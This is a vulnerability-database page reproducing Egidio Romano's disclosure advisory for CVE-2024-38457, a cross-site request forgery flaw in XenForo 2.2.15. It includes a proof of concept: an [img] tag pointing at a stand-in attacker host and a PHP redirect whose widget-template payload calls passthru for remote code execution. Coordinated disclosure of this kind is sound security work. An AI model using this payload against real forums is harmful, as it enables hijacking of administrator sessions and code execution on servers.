Vulners
Lucene search
XenForo 2.2.15 Cross Site Request Forgery
🗓️ 17 Jul 2024 00:00:00Reported by EgiX, karmainsecurity.comType 
packetstorm🔗 packetstormsecurity.com👁 1014 Views
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | XenForo 2.2.15 Cross Site Request Forgery Vulnerability | 17 Jul 202400:00 | – | zdt |
 | CVE-2024-38457 | 30 Jul 202406:07 | – | circl |
 | XenForo Cross-Site Request Forgery Vulnerability | 16 Jun 202400:00 | – | cnnvd |
 | CVE-2024-38457 | 16 Jun 202400:00 | – | cve |
 | CVE-2024-38457 | 16 Jun 202400:00 | – | cvelist |
 | CVE-2024-38457 | 16 Jun 202415:15 | – | nvd |
 | CVE-2024-38457 | 16 Jun 202415:15 | – | osv |
 | PT-2024-28013 · Xenforo · Xenforo | 16 Jun 202400:00 | – | ptsecurity |
 | CVE-2024-38457 | 23 May 202509:10 | – | redhatcve |
 | CVE-2024-38457 | 16 Jun 202400:00 | – | vulnrichment |
10
`-------------------------------------------------------------------------------
XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability
-------------------------------------------------------------------------------
[-] Software Link:
https://xenforo.com
[-] Affected Versions:
Version 2.2.15 and prior versions.
[-] Vulnerability Description:
The XF\Admin\Controller\Widget::actionSave() method, defined into the
/src/XF/Admin/Controller/Widget.php script, does not check whether the
current HTTP request is a POST or a GET before saving a widget.
XenForo does perform anti-CSRF checks for POST requests only, as such
this method can be abused in a Cross-Site Request Forgery (CSRF)
attack to create/modify arbitrary XenForo widgets via GET requests,
and this can also be exploited in tandem with KIS-2024-06 to perform
CSRF-based Remote Code Execution (RCE) attacks.
Furthermore, XenForo implements a BB code system, as such this
vulnerability could also be exploited through "Stored CSRF" attacks by
abusing the [img] BB code tag, creating a thread or a private message
(to be sent to the victim user) like the following:
[img]https://attacker.website/exploit.php[/img]
Where the exploit.php script hosted on the attacker-controlled website
could be something like this:
<?php
$url = "https://victim.website/xenforo/";
header("Location:
{$url}admin.php?widgets/save&definition_id=html&widget_key=RCE&positions[pub_sidebar_top]=1&display_condition=true&options[template]={{\$xf.app.em.getRepository('XF\\Util\\Arr').filterRecursive(['id'],'passthru')}}");
?>
Successful exploitation of this vulnerability requires a victim user
with permissions to administer styles or widgets to be currently
logged into the Admin Control Panel.
[-] Solution:
Update to a fixed version or apply the vendor patches.
[-] Disclosure Timeline:
[22/02/2024] - Vulnerability details sent to SSD Secure Disclosure
[05/06/2024] - Vendor released patches and fixed versions
[14/06/2024] - CVE identifier requested
[16/06/2024] - CVE identifier assigned
[16/07/2024] - Coordinated public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CVE-2024-38457 to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Other References:
https://xenforo.com/community/threads/222133
https://ssd-disclosure.com/ssd-advisory-xenforo-rce-via-csrf/
[-] Original Advisory:
http://karmainsecurity.com/KIS-2024-05
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Jul 2024 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.06564